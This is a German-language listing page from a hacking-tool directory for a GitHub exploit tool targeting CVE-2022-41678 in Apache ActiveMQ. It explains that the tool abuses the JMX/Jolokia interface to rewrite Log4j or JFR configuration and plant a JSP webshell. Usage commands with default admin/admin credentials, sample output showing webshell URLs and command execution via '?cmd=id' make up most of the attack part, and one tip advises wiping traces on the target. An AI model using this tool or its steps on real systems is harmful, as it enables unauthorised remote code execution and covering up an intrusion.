Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-41678 — CVE-2022-41678 ist eine Remote-Code-Ausführung-Sicherheitslücke in Apache ActiveMQ. Die Sicherheitslücke ermöglicht es einem Angreifer, über die JMX-Schnittstelle (Java Management Extensions) die Log4j-Konfiguration oder die JFR-Konfiguration (Java Flight Recorder) zu ändern, um so eine bösartige JSP-Webshell in das Webverzeichnis des Servers zu schreiben und letztendlich eine Remote-Code-Ausführung zu erreichen. | Kitploit
Tools/GitHubGitHub/urjack2025/cve-2022-41678
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHuburjack2025/cve-2022-41678

CVE-2022-41678

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
22vor 11 MonatenNoch nicht geprüft

Über

CVE-2022-41678 ist eine Remote-Code-Ausführung-Sicherheitslücke in Apache ActiveMQ. Die Sicherheitslücke ermöglicht es einem Angreifer, über die JMX-Schnittstelle (Java Management Extensions) die Log4j-Konfiguration oder die JFR-Konfiguration (Java Flight Recorder) zu ändern, um so eine bösartige JSP-Webshell in das Webverzeichnis des Servers zu schreiben und letztendlich eine Remote-Code-Ausführung zu erreichen.

Teilen

Apache ActiveMQ CVE-2022-41678 Exploit-Tool

Einführung in die Schwachstelle

Referenzdokument: https://app.nextcyber.cn/courses/41/tasks/580

CVE-2022-41678 ist eine Schwachstelle zur Remote-Codeausführung in Apache ActiveMQ. Diese Schwachstelle ermöglicht es Angreifern, über die JMX-Schnittstelle (Java Management Extensions) die Log4j-Konfiguration oder die JFR-Konfiguration (Java Flight Recorder) zu ändern, um eine bösartige JSP-Webshell in das Webverzeichnis des Servers zu schreiben und letztendlich eine Remote-Codeausführung zu erreichen.

Diese Schwachstelle betrifft mehrere Versionen von Apache ActiveMQ; die genauen betroffenen Versionen hängen von der Nutzung der Log4j- und JFR-Konfiguration ab.

Systemanforderungen

  • Python 3.6 oder höher
  • Installieren Sie die erforderlichen Abhängigkeiten:
    root@kitploit:~
    pip install requests
    
  • Der Ziel-ActiveMQ-Server muss die JMX-Schnittstelle aktiviert haben (normalerweise über den Pfad /api/jolokia/ zugänglich)
  • Der Angreifer muss den Benutzernamen und das Passwort der ActiveMQ-Konsole kennen (Standard ist normalerweise admin/admin)

Verwendung

Grundlegende Verwendung

Verwendung der Standard-Anmeldedaten admin/admin und automatisch erkannter Exploit-Methode:

root@kitploit:~
python exp.py http://target:8161

Sie können auch mit den Parametern -u und -p Benutzername und Passwort angeben:

root@kitploit:~
# Log4j verwenden
python exp.py -u admin -p admin http://10.22.174.214:8161

# Ausgabe (Beispiel)
python exp.py -u admin -p admin http://10.22.174.214:8161
2025-10-14 22:53:54,115 - INFO - choice MBean 'org.apache.logging.log4j2:type=5faeada1' automatically
2025-10-14 22:53:54,334 - INFO - update log config
2025-10-14 22:53:54,467 - INFO - write webshell to http://10.22.174.214:8161/admin/shell.jsp?cmd=id
2025-10-14 22:53:54,655 - INFO - restore log config

Zusätzlich zur standardmäßigen Log4j-Methode kann die JFR-Methode mit dem Parameter --exploit jfr verwendet werden.

root@kitploit:~
# JFR-Methode verwenden
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161

# Ausgabe (Beispiel)
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161/
2025-10-14 23:16:35,978 - INFO - choice MBean jdk.management.jfr:type=FlightRecorder manually
2025-10-14 23:16:37,390 - INFO - create flight record, id = 1
2025-10-14 23:16:37,533 - INFO - update configuration for record 1
2025-10-14 23:16:38,167 - INFO - start record
2025-10-14 23:16:39,243 - INFO - stop record
2025-10-14 23:16:39,309 - INFO - write webshell to http://10.22.174.214:8161/admin/shelljfr.jsp?cmd=id

Überprüfung des Exploit-Ergebnisses

Nach erfolgreichem Exploit können Sie Befehle über die folgenden URLs ausführen:

root@kitploit:~
# Webshell (geschrieben mit Log4j-Methode)
http://target:8161/admin/shell.jsp?cmd=Befehl

# Webshell (geschrieben mit JFR-Methode)
http://target:8161/admin/shelljfr.jsp?cmd=Befehl

Zum Beispiel, um den Befehl id auszuführen:

root@kitploit:~
http://target:8161/admin/shell.jsp?cmd=id

Parameterbeschreibung des Tools

ParameterKurzformTypStandardwertBeschreibung
--username-uStringadminBenutzername der ActiveMQ-Konsole
--password-pStringadminPasswort der ActiveMQ-Konsole
--exploit-eStringautoExploit-Methode, mögliche Werte: auto, log4j, jfr
url-String-Ziel-URL des ActiveMQ (erforderlicher Parameter)

Hinweise

  1. Dieses Tool ist nur für Sicherheitsforschung und autorisierte Tests gedacht. Verwenden Sie es nicht auf nicht autorisierten Systemen.
  2. Nach erfolgreichem Exploit versucht das Tool, die ursprüngliche Log4j-Konfiguration wiederherzustellen, um die Auswirkungen auf das Zielsystem zu minimieren.
  3. Wenn das Zielsystem Netzwerkzugriffsbeschränkungen hat, müssen möglicherweise die Netzwerkeinstellungen angepasst werden, um den Zugriff auf die JMX-Schnittstelle des Ziels zu gewährleisten.
  4. Verschiedene Versionen von ActiveMQ können unterschiedliche Pfade und Konfigurationen haben; möglicherweise müssen die Pfade im Tool entsprechend angepasst werden.
  5. Das Tool verwendet die JMX-Schnittstelle; stellen Sie sicher, dass diese Schnittstelle auf dem Ziel-ActiveMQ aktiviert ist.
  6. Die Ausführung dieses Tools kann Protokolleinträge auf dem Zielsystem hinterlassen; achten Sie darauf, relevante Spuren zu bereinigen.
Tool herunterladen